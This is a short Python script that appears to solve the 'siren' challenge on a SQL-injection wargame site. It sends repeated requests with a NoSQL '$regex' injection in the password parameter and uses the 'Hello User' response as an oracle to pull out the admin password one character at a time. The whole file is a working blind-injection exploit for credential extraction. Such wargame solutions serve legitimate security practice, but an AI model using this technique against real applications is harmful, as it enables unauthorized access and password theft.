import requests
import string
URL = 'https://los.rubiya.kr/chall/siren_9e402fc1bc38574071d8369c2c3819ba.php?id='
PHPSESSID = 'MY_PHPSESSID'
TRUE_PHRASE = 'Hello User'
def query(payload):
cookies = {'PHPSESSID': PHPSESSID}
r = requests.get(URL + payload, cookies=cookies)
content = r.text
return TRUE_PHRASE in content
# 1588f5a3
def find_pw():
pw = ''
while True:
found = False
for character in string.printable:
if character in "#$&*?|":
continue
elif query("admin&pw[$regex]=^{}{}".format(pw, character)) is True:
pw += character
found = True
break
if found is False:
break
print('pw: {}'.format(pw))
find_pw()
